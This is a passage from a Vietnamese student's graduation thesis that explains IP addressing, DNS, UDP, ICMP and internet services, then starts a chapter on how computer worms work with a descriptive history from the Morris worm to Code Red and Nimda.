  19. Khóa luận tốt nghiệp chống Địa chỉ lớp C Một số tổ chức có quy mô nhỏ có thể xin cấp phát địa chỉ lớp C. Một địa chỉ lớp C được nhận ra với 3 bits đầu mang giá trị 110. Mạng lớp C sử dụng 3 byte đầu để đánh địa chỉ mạng và 1 byte cuối đánh địa chỉ máy trong mạng. Có 2.097.150 địa chỉ lớp C, mỗi địa chỉ lớp C có 254 máy. Địa chỉ lớp C có dạng: Địa chỉ lớp C được nhận ra với byte đầu tiên trong khoảng 192 tới 223 Ví dụ: 200.6.5.4: Nút được gán Host ID là 4, nằm trong mạng lớp C có địa chỉ là 200.6.5.0 Địa chỉ lớp D Địa chỉ mạng lớp D thì sẽ chạy trong dải 224.0.0.0 đến 239.255.255.255 khi ta quy đổi ra cách đọc bằng số thập phân. Các địa chỉ mạng lớp D dùng cho mục đích multicast, khác với các địa chỉ lớp A, B, C. Như vậy chúng ta sẽ có 268.435.456 các nhóm multicast khác nhau. Địa chỉ lớp E Địa chỉ mạng lớp E thì sẽ chạy trong dải 240.0.0.0 đến 255.255.255.255 khi ta quy đổi ra cách đọc bằng số thập phân. Có thể thấy địa chỉ 255.255.255.255 là một địa chỉ đặc biệt và được sử dụng cho mục đích đặc biệt khác. Các địa chỉ mạng lớp E dùng cho mục đích trong tương lai chứ hiện nay chưa được sử dụng. 1.2.4. Dịch vụ tên miền(Domain Name Service - DNS) Việc định vị các máy tính trên mạng bằng các địa chỉ IP có nhiều lợi điểm như đã trình bày ở phần trên, tuy nhiên với người sử dụng, việc nhớ các con số đó là một việc tẻ nhạt khó chịu. Hơn nữa, địa chỉ IP không mang thông tin về địa lý, tổ chức hay người dùng. Vì thế, người ta xây dựng hệ thống đặt tên gọi là Domain Name Server để cung cấp cho người dùng cách đặt tên cho các máy tính với cách đặt tên thông thường quen thuộc. Một Domain name thông thường có dạng: Tên_người_dùng@Tên_miền Trần Thị Thúy_ Lớp CT901 16
  20. Khóa luận tốt nghiệp chống Với tên miền được phân cấp làm các cấp nối với nhau bởi dấu “.”. Tên miền được NIC cung cấp Tên miền cao nhất là cấp quốc gia đƣợc đặt bởi 2 chữ cái: ví dụ ar: Argentina at: Austria au: Australia be: Belgium ca: Canada cn: China de: Germany es: Spain fr: France gb: Great britain hk: Honkong il: Ixrael it: Italy jp: Japan kr: Korea lu: Luxembourg my: Malaysia no: Norway vn: Việt Nam Nếu không có gì thì được hiểu như thuộc USA Trần Thị Thúy_ Lớp CT901 17
  21. Khóa luận tốt nghiệp chống Mức tiếp theo chỉ lĩnh vực hoạt động: edu:Giáo dục gov: Chính phủ com: Thương mại mil: Quân sự org: Các tổ chức phi lợi nhuận net:Các tổ chức phát triển mạng Sau đó có thể là tên công ty và tên máy tính. vn gov edu com mil org nic vnuh hut vdc fpt fit Phân cấp domain name Một máy tính có thể có nhiều tên nhưng trên mạng, mỗi tên là duy nhất. Việc ánh xạ địa chỉ IP vào tên miền được thực hiện bởi các Name Server cài đặt tại máy Server và Name Resolver cài đặt trên máy trạm. Các dịch vụ đăng ký cho Internet (các địa chỉ IP và các tên miền DNS) trước đây được NIC xử lý, tại nic.ddn.mil. Ngày 01/04/1993, InterNIC được sáng lập. Hiện nay, NIC chỉ xử lý các yêu cầu cho mạng dữ liệu quốc phòng Mỹ (Defense Data Network – DDN). Tất cả người dùng Internet khác sử dụng các dịch vụ đăng ký của InterNIC tại rs.internic.net. Thực ra InterNIC có các bộ phận: các dịch vụ đăng ký (rs.internic.net), các dịch vụ thông tin (rs.internic.net). Có ba loại địa chỉ IP: Địa chỉ unicast (dành cho một host đơn), Trần Thị Thúy_ Lớp CT901 18
  22. Khóa luận tốt nghiệp chống broadcast (dành cho tất cả các host trên một mạng cho trước), và multicast (dành cho một tập hợp các host thuộc về một nhóm multicast). 1.2.5. Nhược điểm của TCP/IP Giao thức TCP/IP là giao thức được phát triển nhanh nhất từ thập niên 90 trở lại đây. Hiện nay, giao thức TCP/IP hoàn toàn thống trị trên mạng Internet. Chính việc sử dụng rộng rãi của nó làm cho bất kỳ sở hở nào về an toàn của TCP/IP cũng đều gây ảnh hưởng to lớn. Do kỹ thuật TCP/IP dùng cho thông tin số liệu mà nó là mạng không có kết nối (connectionless), khi gói tin số liệu đi qua mạng truyền dẫn, nó không dùng một đường đi được chỉ định nào, cho nên kỹ thuật TCP/IP không thể đảm bảo chất lượng phục vụ cho đầu cuối ứng dụng. Dù kỹ thuật TCP/IP trên phương diện mạng đã thu được thành công to lớn, nhưng cũng càng bộc lộ những nhược điểm của nó. Giao thức TCP/IP vào thời kỳ đầu thiết kế còn chưa xét tới vấn đề an toàn, hơn thế nữa thuê bao và người quản lí mạng chưa có đầy đủ khái niệm khống chế an toàn mạng, thêm vào đó là hệ điều hành và chương trình ứng dụng ngày càng phức tạp, người phát minh ra nó không có khả năng phát hiện ra tất cả các sơ hở về an toàn, nên hệ thống máy tính được đấu trên mạng có khả năng bị tấn công ác ý và lấy cắp thông tin từ bên ngoài. Đằng sau việc sử dụng nguồn dữ liệu giữa các loại máy tính khác nhau, là sự kích thích đối với tin tặc nhưng cũng lại làm đau đầu các chuyên gia an toàn mạng, khi mà sự sơ hở và nhược điểm liên tiếp xuất hiện như: Cơ chế nhận dạng yếu kém, rất dễ bị nghe trộm hoặc theo dõi, dễ bị lừa khi máy chủ phục vụ mạng LAN yếu kém, lắp đặt và khống chế phức tạp, dựa vào an toàn của máy chủ khó mở rộng, tính không bảo mật được địa chỉ IP. Để giải quyết vấn đề an toàn của TCP/IP, cơ quan quản lý kỹ thuật Internet IETF (nhóm nhiệm vụ kỹ thuật Internet) nghiên cứu ra một loại giao thức IP mới, gọi là Ipv6. Độ dài địa chỉ của giao thức IP mới hiện nay là 32 bits đã mở rộng tới 128 bits, tăng cường cơ chế an toàn, trọng điểm là từ hai mặt phân biệt và bảo mật, định ra một loại tiêu chuẩn, nhằm đảm bảo cho sự ứng dụng trong thế kỷ 21. Tháng 8/1995, IETF đã công bố năm tiêu chuẩn có liên Trần Thị Thúy_ Lớp CT901 19
  23. Khóa luận tốt nghiệp chống quan về an toàn để quy định chức năng an toàn của Internet. Năm tiêu chuẩn này là : RFC 1625 (giới thiệu tổng hợp kết cấu thế hệ an toàn), RFC 1826 (mô tả phân nhóm phân biệt mở rộng tới IP), RFC 1228 (cơ chế phân biệt chuyên dùng), RFC 1829 (cơ chế tăng cường bảo mật chuyên dùng). IPv6 hỗ trợ có tính cưỡng chế các tiêu chuẩn an toàn này, đặc tính an toàn của nó chủ yếu là thực hiện trong phần mở rộng sau IP header. Ngoài ra, trên quốc tế một số công ty còn liên tục đề xuất rất nhiều giao thức an toàn khác như: SSL : Nó là giao thức lớp bọc an toàn thuộc họ giao thức TCP/IP. S – HTTP : Nó là giao thức truyền dẫn an toàn siêu văn bản, nó là một loại phát triển mở rộng đối với HTTP, làm việc trên tầng ứng dụng, có thể cho thuê bao ký tên bằng chữ ký số trên bất kỳ văn bản nào. SEEP : Giao thức an toàn chi trả điện tử. SET : Giao thức an toàn giao dịch điện tử. IKP : Giao thức chi trả có khống chế khóa mã Internet. 1.3. Giao thức không kết nối (User Datagram Protocol - UDP) UDP cho phép chương trình ứng dụng truy cập trực tiếp đến gói tin của dịch vụ chuyển giao giống như dịch vụ mà giao thức IP cung cấp. Nó cho phép ứng dụng trao đổi thông tin qua mạng với ít thông tin điều khiển nhất. UDP là giao thức không kết nối, kém tin cậy vì nó không có cơ chế kiểm tra tính đúng đắn của dữ liệu truyền. 1.3.1.Gói thông tin UDP 0 31 Trần Thị Thúy_ Lớp CT901 20
  24. Khóa luận tốt nghiệp chống Source port Destination port Message length checksum Data Destination Source Type IP UDP data CRC Address Address Field header Mỗi gói thông tin UDP gọi là một Datagram được phân làm 2 phần header và data trong đó header chứa thông tin về địa chỉ cổng nguồn, địa chỉ cổng đích, độ dài của gói và checksum 1.3.2. Phân kênh và hợp kênh Phân kênh, hợp kênh chính là việc lựa chọn những tiến trình ứng dụng trong một số lớn các tiến trình sử dụng giao thức UDP, và cần chọn ra những ứng dụng tương ứng với gói thông tin chuyển đến. Port 1 Port 2 Port 3 UDP: Demultiplexing Based on Port UDP Datagram arrives IP Layer Việc này được giải quyết bằng cơ chế cổng (Port mechanism) cơ chế này gắn mỗi ứng dụng với một con số gọi là số hiệu cổng (Port number) và mỗi gói thông tin mà ứng dụng gửi đi đều mang một trường SOURCE PORT. Tại nơi nhận, dựa vào thông tin trong trường DESTINATION PORT mà gói tin đó được truyền đến cổng tương ứng với ứng dụng. Ví dụ mọi bản Trần Thị Thúy_ Lớp CT901 21
  25. Khóa luận tốt nghiệp chống TCP/IP đều có dịch vụ FTP (File Transfer Protocol) gắn với cổng 21 và TFTP (Trivial File Transfer Protocol) gắn với cổng 69 của UDP. Việc sử dụng các port number cũng có nhiều cách Dùng những cổng dành riêng cho từng ứng dụng đã được đăng ký trước (Well – known port assigment) Một port number sẽ được sinh ra khi có một ứng dụng đòi hỏi (Dynamic binding). Cách tiếp cận kết hợp các kiểu trên (Hybird) vừa sử dụng Well – known port assignment cho một số port number vừa có thể định nghĩa các port number khác khi cần thiết. Các port number thông dụng của UDP thường được dành chỗ từ 1 tới 255. Một số hệ điều hành (như 4.3 BSD UNIX) còn dành chỗ tới port number 1023, các port number có thể sử dụng được là từ số 1024 trở lên Một số cổng UDP dành riêng 0 Reserved 7 Echo 9 Discard 11 Active users 13 Daytime 15 Who is up or NETSTAT 17 Quote of the day 19 Character generator 37 Time 42 Name server 43 Who is 53 Domain name server 67 Boottrap protocol server 68 Boottrap protocol client Trần Thị Thúy_ Lớp CT901 22
  26. Khóa luận tốt nghiệp chống 69 Trivial File Tranfer Protocol ( TFTP) 111 Sun RPC 123 Network time protocol 161 SNMP net monitor 162 SNMP traps 512 UNIX comsat 513 UNIX rwho process 514 System log 525 Timed Có một số lý do để ngƣời lập trình ứng dụng lựa chọn UDP nhƣ một dịch vụ giao vận: Nếu một số lượng lớn các gói tin nhỏ được truyền, thông tin cho việc kết nối và sửa lỗi có thể lớn hơn nhiều so với thông tin cần truyền. Trong trường hợp này UDP là giải pháp hiệu quả nhất. Những ứng dụng kiểu “Query - Response” cũng rất phù hợp với UDP, câu trả lời có thể dùng làm sự xác nhận của một câu hỏi. Nếu không nhận được sự trả lời sau một thời gian nào đó, ứng dụng chỉ cần gửi đi một câu hỏi khác Một số ứng dụng đã tự nó cung cấp công nghệ riêng để chuyển giao thông tin tin cậy, và không đòi hỏi dịch vụ này của transport layer 1.4. Giao thức điều khiển truyền tin (Internet Control Message Protocol - ICMP) Việc dẫn đường qua các mạng sử dụng giao thức điều khiển truyền tin (Internet Control Message Protocol - ICMP) được định nghĩa trong RFC 792. ICMP sử dụng gói tin IP để truyền thông báo của nó. ICMP gửi các thông báo làm các công việc: Điểu khiển, thông báo lỗi và chức năng thông tin cho TCP/IP. Thông thường ICMP được gửi khi một gói tin không thể đi tới đích, một gateway không còn đủ chỗ nhớ để nhận thêm gói tin hay một gateway Trần Thị Thúy_ Lớp CT901 23
  27. Khóa luận tốt nghiệp chống hướng dẫn máy tính sử dụng gateway khác để truyền thông tin theo một con đường tối ưu hơn. Gói tin ICMP Mặc dầu mỗi thông báo ICMP có môt kiểu định dạng riêng của nó, song các thông báo đều chưa 3 trường đầu tiên giống nhau: TYTE: Định nghĩa thông báo đi sau. CODE: Cung cấp thông tin thêm về thông báo. CHECKSUM: Chứa checksum của thông báo. Type Field ICMP Message Type 0 Echo Reply 3 Destination Unreachable 4 Source Quench 5 Redirect (Change a router) 8 Echo Request 11 Time Exceeded for a Datagram 12 Parameter Problem on a Datagram 13 Timestamp Request 14 Timestamp Reply 15 Information Request 16 Information Reply 17 Address Mask Request 18 Address Mask Reply 1.4.1. Điều khiển dòng dữ liệu Khi trạm nguồn gửi dữ liệu tới quá nhanh, trạm đích không kịp xử lý, trạm đích, hay một thiết bị dẫn đường gửi trả trạm nguồn một thông báo để nó tạm ngừng việc truyền thông tin. Trần Thị Thúy_ Lớp CT901 24
  28. Khóa luận tốt nghiệp chống 1.4.2. Thông báo lỗi Khi không tìm thấy trạm đích, một thông báo lỗi Destination Unreachable được gateway gửi trả lại trạm nguồn. Nếu một số hiệu cổng không phù hợp, trạm đích gửi thông báo lỗi lại cho trạm nguồn (cổng sẽ được trình bày trong phần giao thức tầng giao vận) 1.4.3. Định hướng lại Một gateway gửi thông báo định hướng lại để trạm gửi sử dụng một gateway khác bởi vì gateway đó là một lựa chọn thích hợp hơn. Trường hợp này chỉ xảy ra khi trạm gửi nối vào mạng có trên 2 gateway. Ví dụ máy tính B muốn gửi thông tin đến máy C, nếu thông báo đó đến gateway 1 phải gửi thông báo redirect máy tính đó qua gateway 2. Ngược lại , mỗi máy tính trên mạng X.25 muốn gửi thông báo tới máy tính nằm trên mạng Token Ring thì việc này không cần thiết vì gateway 1 được nối trực tiếp với mạng Token Ring. Token Ring Gateway 1 Host A Host B X.25 Gateway 2 Host C Ethernet 1.4.4. Kiểm tra trạm làm việc Khi một máy tính muốn kiểm tra một máy khác có tồn tại và đang hoạt động hay không, nó gửi một thông báo Echo Request. Khi trạm đích nhận được thông báo đó, nó gửi lại một Echo Reply. Lệnh ping của UNIX sử dụng các thông báo này. Trần Thị Thúy_ Lớp CT901 25
  29. Khóa luận tốt nghiệp chống 1.5. Các dịch vụ mạng 1.5.1. Dịch vụ WEB Dịch vụ WEB (còn gọi là WWW) là dịch vụ sử dụng ngôn ngữ đánh dấu siêu văn bản HTML để tạo ra các trang thông tin đa phương tiện chứa văn bản, hình ảnh, âm thanh, dữ liệu Hoạt động theo mô hình Client/Server 1.5.2. Dịch vụ truyền File Dịch vụ truyền file (FTP) là một trong những dịch vụ phổ biến nhất trên mạng dùng để truyền tải các file giữa các máy chủ trên mạng, giữa máy chủ và máy khách. Các file có thể ở dạng văn bản, ảnh tĩnh, ảnh video, các thư viện, đặc biệt là các phần mềm ứng dụng được cung cấp miễn phí hoặc thử nghiệm. Việc truyền file được thông qua giao thức FTP không phụ thuộc vào vị trí địa lý hay môi trường hệ điều hành giữa các máy. 1.5.3.Dịch vụ truy nhập từ xa(Telnet) Telnet cho phép người sử dụng từ một trạm làm việc của mình có thể đăng nhập (login) vào một trạm xa như là một đầu cuối (teminal) nối trực tiếp với trạm xa đó. 1.5.4. Dịch vụ tra cứu theo chỉ mục Dịch vụ tra cứu theo chỉ mục (Gopher) là một dịch vụ tra cứu thông tin theo chủ đề và sử dụng các thực đơn. Máy chủ Gopher lưu trữ tài liệu, ngoài ra còn một số máy lưu trữ các chỉ dẫn kết nối hoặc địa chỉ của các Gopher khác. Thông qua các client của Gopher người sử dụng thể nhận các file văn bản, hình ảnh, đồ họa, âm thanh. 1.5.5. Dịch vụ nhóm tin Dịch vụ nhóm tin (Usenet) được coi là mạng nhóm tin lớn nhất trên thế giới do hàng ngàn máy phục vụ tin (New Host) được liên kết lại với nhau để truyền đạt tin tức. Mạng nhóm tin là môi trường tranh luận thế giới. Nó giúp cho người sử dụng có thể trao đổi thông tin về chủ đề mà họ quan tâm. Khác với tranh luận theo danh sách thư điện tử là thư của từng thành viên trong danh sách thư điện tử được gửi đến cho từng người riêng lẻ. Thư trên Usernet được được Trần Thị Thúy_ Lớp CT901 26
  30. Khóa luận tốt nghiệp chống gửi đến một máy chủ chứa tin. Người sử dụng có thể đặt câu hỏi, đưa ra ý kiến tranh luận về một chủ đề nào đó, gửi thông báo hoặc tài liệu vào Usernet. 1.5.6. Dịch vụ tìm kiếm thông tin diện rộng Dịch vụ này gọi là WAIS (Wide Area Information Service), là công cụ tìm kiếm thông tin trên mạng thông qua chuỗi các đề mục lừa chọn, dịch vụ WAIS cho phép người dùng tìm kiếm các tệp dữ liệu có chứa một xâu ký tự xác định trước. 1.5.7. Dịch vụ tìm kiếm tên tệp Dịch vụ tìm kiếm tên tệp (Archie) là một tập hợp các máy chủ, một máy chủ này lại lưu trữ địa chỉ của một vài máy FTP server vô danh khác. Các FTP server này lưu trữ địa chỉ của các file của máy chủ công cộng và các máy chủ này được cập nhật liên tục. Các Archie Server sử dụng FTP để nạp xuống danh sách của các file lưu trữ tại các host công cộng và cập nhật danh sách này vào cơ sở dữ liệu. Người dùng có thể truy cập vào Archie server bằng cách kết nối trực tiếp thông qua chương trình Telnet và sử dụng các nhóm lệnh của Archie hoặc có thể kết nối gián tiếp thông qua thư điện tử, thư chứa các lệnh cần thiết của phiên làm việc và Archie sẽ gửi giúp cho người dùng theo đường thư điện tử. 1.5.8. Dịch vụ hội thoại Dịch vụ này còn gọi là IRC (Internet Relay Chat) là một phương tiện “thời gian thực” trao đổi qua mạng. IRC có thể mang tính chất cá nhân tức người khác không thế khám phá nội dung trao đổi của họ. Cũng có thể tạo “kênh mở” cho nhiều người cùng tham gia. Ngoài việc trao đổi bằng lời người dùng có thể gửi file cho nhau như hình ảnh, chương trình, tài liệu và những thứ khác. 1.5.9. Dịch vụ thư điện tử Dịch vụ thư điện tử (Email) là dịch vụ quan trọng và phổ biến nhất trên Internet vì tính tiện dụng của nó. Thư điện tử không phải là một dịch vụ “đầu – cuối” (end to end). Nghĩa là máy gửi thư và máy nhận thư không cần phải liên kết trực tiếp với nhau để thực hiện chuyển thư. Nó là dịch vụ kiểu “lưu và Trần Thị Thúy_ Lớp CT901 27
  31. Khóa luận tốt nghiệp chống chuyển tiếp” (store and forward). Thư điện tử được chuyển từ máy này sang máy khác cho tới máy đích. Đây là một dịch vụ phổ biến nhất trên Internet trước khi World Wide Web ra đời, thông qua dịch vụ này, người sử dụng trên mạng có thể trao đổi các thông báo cho nhau trên phạm vi thế giới. Đây là một dịch vụ mà hầu hết các mạng diện rộng đều cài đặt và cũng là dịch vụ cơ bản nhất của một mạng khi gia nhập Internet. Nhiều người sử dụng máy tính tham gia mạng chỉ dùng duy nhất dịch vụ này. Dịch vụ này sử dụng giao thưc SMTP(Simple Mail Transfer Protocol) trong họ giao thức TCP/IP. Thư điện tử là phương thức trao đổi thông tin nhanh chóng và thuận tiện. Người sử dụng có thể trao đổi những bản tin ngắn hay dài chỉ bằng một phương thức duy nhất. Rất nhiều người sử dụng thường truyền tin thông qua thư điện tử chứ không phải bằng các chương trình truyền tập tin thông thường. Đặc điểm của dịch vụ thư điện tử là không tưc thời (off - line) – tất cả các yêu cầu gửi đi không đòi hỏi phải được xử lý ngay lập tức. Khi người sử dụng gửi một bức thư, hệ thống sẽ chuyển thư này vào một vùng riêng (gọi là spool) cùng với các thông tin về người gửi, người nhận, địa chỉ máy nhận Hệ thống sẽ chuyển thư đi bằng một chương trình chạy nền (background). Chương trình gửi thư này sẽ xác định địa chỉ IP máy cần gửi cho tới tạo một liên kết với máy đó. Nếu liên kết thành công, chương trình gửi thư sẽ chuyển thư tới vùng spool của máy nhận. Nếu không thể kết nối với máy nhận thì chương trình gửi thư sẽ ghi lại những thư chưa được chuyển và sau đó sẽ thử gửi lại một lần nó hoạt động. Khi chương trình gửi thư thấy một thư không gửi được sau một thời gian quá lâu (ví dụ 3 ngày) thì nó sẽ trả lại bức thư này cho người gửi. Mọi thư trên Internet đều tuân theo một dạng chuẩn. Bao gồm phần header chứa địa chỉ người gửi, địa chỉ người nhận dạng domain name và sau đó là phần nội dung thư. Cả hai phần đều là các ký tự ASCII chuẩn. Thư chuyển trên mạng và đến được đích là nhờ vào thông tin chứa trong phần header của thư Trần Thị Thúy_ Lớp CT901 28
  32. Khóa luận tốt nghiệp chống Ban đầu thư điện tử chỉ nhằm mục đích trao đổi các thông báo (thực chất là các tệp văn bản) giữa người sử dụng với nhau. Dần dần người ta đã phát triển thêm các biến thể trên nó để phục vụ người sử dụng tốt hơn hoặc dùng cho những mục đích riêng biệt. Đó là các dịch vụ thông tin dựa trên thư điện tử. Thực chất của các dịch vụ này là sử dụng thư có nội dung tuân theo một cú pháp đặc biệt thể hiện yêu cầu của người sử dụng. Các thư này được gửi tới một người sử dụng đặc biệt là các server, các server này phân tích nội dung thư, thưc hiện các yêu cầu rồi gửi trả lại kết quả cho người yêu cầu cũng dưới dạng thư điện tử. Có hai server phổ biến trong hoạt động này là Name server cung cấp dịch vụ tra cứu địa chỉ trên mạng Archive server cho phép người sử dụng tìm kiếm và lấy về những tệp tin dùng chung. Trên đây, những khái niệm cơ bản về Internet cùng những ứng dụng trên đó được trình bày. Mục đích của nó là cung cấp những kiến thức cơ sở nhằm phục vụ yêu cầu của các chương sau. Trần Thị Thúy_ Lớp CT901 29
  33. Khóa luận tốt nghiệp chống CHƢƠNG 2 : CÁCH THỨC HOẠT ĐỘNG CỦA SÂU MÁY TÍNH 2.1. Tổng quan về sâu máy tính(worm) 2.1.1. Khái niệm sâu Để đơn giản ta nói là “sâu” mà không nói là sâu máy tính nhưng vẫn được hiểu là sâu máy tính. Sâu là gì? Sâu, giống như một virus, là phần mềm độc hại (malware), có tính năng lây lan và phá hoại sự hoạt động bình thường của mạng máy tính, song khác với virus nó được thiết kế để tự nó lây lan từ máy tính này sang máy tính khác, nhưng nó làm việc đó một cách tự động bằng cách nắm quyền kiểm soát các tính năng trong máy tính, mà các tính năng này có thể truyền tải các tệp hoặc thông tin. Khi có sâu trong hệ thống của mình nó có thể tự di chuyển, không cần sự tác động của con người (như đối với virus là chép các tệp bị nhiễm từ máy này sang máy khác). Một nguy hiểm lớn của sâu máy chính là nó có khả năng tái tạo ở lượng lớn. Ví dụ, một sâu có thể gửi các bản sao chép của chính nó tới tất cả mọi người có trong danh sách địa chỉ thư điện tử của bạn, và máy tính của họ sau đó cũng sẽ làm như vậy, tạo nên một tác dụng lôi kéo làm cho lưu lượng mạng bị quá tải và điều này làm chậm các mạng kinh doanh và Internet nói chung. Khi các sâu mới ra đời, chúng phát tán rất nhanh, làm tắc nghẽn mạng và có thể làm cho bạn (và những người khác) phải chờ lâu gấp nhiều lần để xem các trang Web trên Internet. Sâu máy tính và các virus khác phát tán nhƣ thế nào? Tất cả các virus và nhiều sâu gần như không thể phát tán trừ khi bạn mở hoặc chạy một chương trình bị nhiễm. Nhiều virus nguy hiểm nhất chủ yếu phát tán qua các phần đính kèm với thư điện tử - các tệp được gửi cùng với một thông điệp thư điện tử. Bạn thường có thể nhìn nhận ra nếu thư điện tử của bạn có một phần đính kèm bởi vì bạn sẽ nhìn thấy một biểu tượng gim giấy thể hiện tệp đính kèm và bao gồm tên nó. Ảnh, thư được Trần Thị Thúy_ Lớp CT901 30
  34. Khóa luận tốt nghiệp chống viết trên Microsoft Word, và thậm chí các bảng tính Excel cũng là một loại tệp mà bạn có thể nhận qua thư điện tử mỗi ngày. Virus được khởi chạy khi bạn mở tệp đình kèm (thường bởi nhấn đúp vào biểu tượng đính kèm). 2.1.2. Sự phát triển của virus và worm Khái quát : Virus và worm đã phát triển qua hàng loạt sự cải tiến. Hiện nay, một trong những tính chất của worm là phát tán nhanh và đánh cắp thông tin. Các thế hệ phát triển của virus, worm : Thế hệ thứ nhất : (năm 1979 đến đầu những năm 1990). Đầu tiên những virus ra đời thông thường là virus boot – sector hầu hết mục tiêu là hệ điều hành MSDOS. Còn sâu máy tính đời đầu thường thiên về tạo ra những chương trình lỗi (con rệp) và điều khiển các phần cứng mang tính đặc trưng. Thuật ngữ "worm" được John Shoch và Joh Hupp gọi tại Xerox PARC vào năm 1979, Họ đã viết chương trình truy cập đến các máy tính và phát tán ra các máy tính khác. Bằng cách tự tạo các bản sao, nhưng thực ra ý tưởng tự sao chép đã được nhà toán học nổi tiếng trong lĩnh vực tin học đó chính là John Von Neuman tìm ra từ những năm 1949. Cái khác mà Shoch và Hupp đặt ra đó chính là dùng worm để lây nhiễm trên cả những máy nhàn rỗi có nghĩa là dù các máy đó có tần suất làm việc thấp nhưng vẫn bị nhiễm worm. Thời gian này worm được tạo ra đều có giới hạn thời gian sống của nó, bằng cách gửi một gói dữ liệu đặc biệt nào đó sẽ giết chết tất cả các sâu. Bất chấp sự bảo đảm an toàn, một trong những chương trình sâu mang tính bí hiểm vận hành ngoài tầm kiểm soát và phá hủy các máy chủ qua một đêm. Vào năm 1983, Fred Cohen hình thành một ý tưởng là viết ra một chương trình virus máy tính đầu tiên khi mới còn là sinh viên tại USC. Virus "Christma Exec" là một trong những loại đầu tiên dùng E-mail để phát tán, đơn giản nó chỉ vẽ ra một thẻ chúc mừng giáng sinh trên màn hình máy tính dùng ngôn ngữ Script gọi là REXX. Bằng cách gửi bản sao tới các địa chỉ có trong hộp thư. Người nhận Trần Thị Thúy_ Lớp CT901 31
  35. Khóa luận tốt nghiệp chống được nó cứ tin tưởng rằng là người bạn của mình gửi cho mình và cứ thế mở ra và lại như thế mà cơ chế lan ra theo con đường e-mail. Vào ngày 2 tháng 10 năm 1988 một loại sâu nổi tiếng đã làm tể liệt 6000 máy tính trong vòng vài giờ đồng hồ do một sinh viên tên là Robert Morris viết, nguyên lý của loại sâu này là khai thác lỗ hổng của hệ điều hành UNIX trong chương trình gửi mail, và dùng lối tấn công tràn bộ đệm thông qua lỗi trong chương trình finger của UNIX (finger là chương trình tìm hiểu về một người dùng trên mạng). Thế hệ thứ hai : (đầu những năm 1990 đến 1998) các hình thái khai thác của sâu và bộ công cụ : Đây là một thời kỳ phát triển của virus mạnh hơn worm máy tính, mặc dù vậy kĩ thuật phát triển của máy tính cũng ảnh hưởng đến sự phát triển của ý tưởng đó chính là dùng các thuật toán mã hóa đã tạo nên hình thái mới của virus. Hình thái mới này được xuất hiện đầu tiên vào năm 1989 tại Châu Âu. Nó tự nhân bản bằng cách chèn các số ngẫu nhiên vào một lượng bytes cực lớn vào thuật toán giải mã. Hình thái mới này đã trở thành một vấn đề thách thức vào năm 1992 và sau đó là hàng loạt các loại virus như TPE, NED DAME ra đời. Có thể nói việc viết các chương trình virus đã trở thành một trào lưu bắt đầu hình thành các hội các nhóm viết ra những công cụ mà nhờ nó một số người chỉ cần có kĩ năng về lập trình một chút là có thể tạo ra được virus một cách dễ ràng. Điển hình là virus Anna Kournikova, dùng email gắn các đoạn mã virus vào và cả những bức ảnh về tennis cũng bị ảnh hưởng. Bằng cách dùng các đoạn mã VBScript mà nó có thể tự sao chép vào tất cả các địa chỉ trong hộp thư Outlook. Vào năm 1995 virus macro đã xuất hiện, viết cho Word của hệ điều hành windows 95. Nó nhiễm vào file “normal.dot“ của Word một cách tự động khi mở bất kỳ một file Word nào khác. Nhưng một thời gian sau hầu hết mọi người đều biết được cách phòng ngừa. Chính vì vậy mà macro cũng khó phát triển hơn. Trần Thị Thúy_ Lớp CT901 32
  36. Khóa luận tốt nghiệp chống Thế hệ thứ ba: (tư 1999 đến 2000) : Những bức thư với số lượng lớn. Bắt đầu với Happy99. Email đã trở thành một môi trường cho sự lây nhiễm. Vào tháng 1 năm 1999 loại worm này đã phát tán trên email với file gắn kèm vào đó là Happy99.exe. Mỗi khi nó được kích hoạt thì nó sẽ hiện lên pháo hoa trên màn hình với dòng chữ “New Year‟s Day 1999“. Nhưng cái chính là nó đã bí mật thay đổi file WSOCK32.DLL (một file chính cho việc kết nối truyền thông trên Internet) bằng cách dùng một chương trình gọi là “con ngựa thành Trrojan” nó cho phép worm tự nó tham gia vào tiến trình truyền thông trên Internet. File WSOCK32.DLL gốc đã bị đổi tên WSOCK32.SKA Tháng 3 năm 1999, virus macro Melissa đã phát tán rất nhanh lây nhiễm tới 100,000 máy tính trên toàn cầu trong vòng 3 ngày, nó cài đặt một bản ghi mới và tắt thư điện tử của nhiều công ty dùng Microsoft Exchange Server. Nó bắt đầu gửi đến một nhóm mới trên mạng đến trang “alt.sex” với tài khoản và password đầy hứa hẹn. Các tài liệu bị tấn công chứa các đoạn mã macro dùng các hàm của Word và outlook e-mail để nhân bản worm. Tiếp theo virus tìm kiếm khóa Registry hiện thời chứa xâu “kwyjibo”. Trong trường hợp không có khóa này thì nó sẽ tự gửi đi 50 bản với địa chỉ cần gửi được lấy trong hộp địa chỉ Outlook. Hơn nữa nó còn lây nhiễm vào file normal.dot dùng macro VBA. Như vậy là bất kỳ một tài liệu nào khi lưu lại sẽ chứa virus. Vào tháng 5 năm 2000, sâu có tên LoveLetter là loại sâu có sự phát tán cực lớn, nó đã trở thành hình mẫu cho loại worm e-mail với số lượng lớn trong tương lai. Nó nhân bản một bản thông điệp với tiêu đề là “ I love you” và dòng chữ này chính là nguyên nhân làm cho những người nhận thư như được khuyến khích để đọc phần đính kèm này. Phần đính kèm chính là đoạn mã VB Script mà nó có thể tự động chạy với Window Script Host (một phần của win 98, win 2000, IE 5 hoặc Outlook5). Worm sẽ tự nó sao chép vào thư mục hệ thống và thay đổi registry mục đích là một file thi hành tự động chạy khi máy tính khởi động. Nó nhiễm vào các loại file có phần mở rộng khác. Khi một máy nhiễm nếu Outlook được cài đặt worm sẽ tự động sao chép một bưc thư điện tử bất kỳ Trần Thị Thúy_ Lớp CT901 33
  37. Khóa luận tốt nghiệp chống một địa chỉ nào có trong hộp địa chỉ. Hơn nữa nó tạo ra những kênh nối IRC. Worm ăn cắp password và thay đổi URL trên IE đến một trang web ở Châu Á. Web site này tìm cách download một chú ngựa Trojan đã được thiết kế để thu lượm các mật khẩu của email khác từ một địa chỉ máy ở Châu Á. Thế hệ thứ tƣ: (từ 2001 đến nay) Thế hệ của những con sâu máy tính hiện đại. Có thể nói đến như Code Red và Nimda với sự lây lan khủng khiếp, nó chính là một hình thái mới của sâu truyền thống nhưng ở mức độ cao hơn thông qua những đặc tính: Tấn công theo kiểu hỗn hợp. Tìm cách lây vào các môi trường mới (Linux, mạng ngang hàng ) Tự cập nhật mã một cách tự động từ Internet. Các đoạn mã nhỏ nguy hiểm. Chống lại các phần mềm chống virus. Có thể nói worm hiện đại đã phát triển một cách vượt bậc: Đi từ những kĩ thuật cơ bản thêm vào đó là sự phát triển của những lối 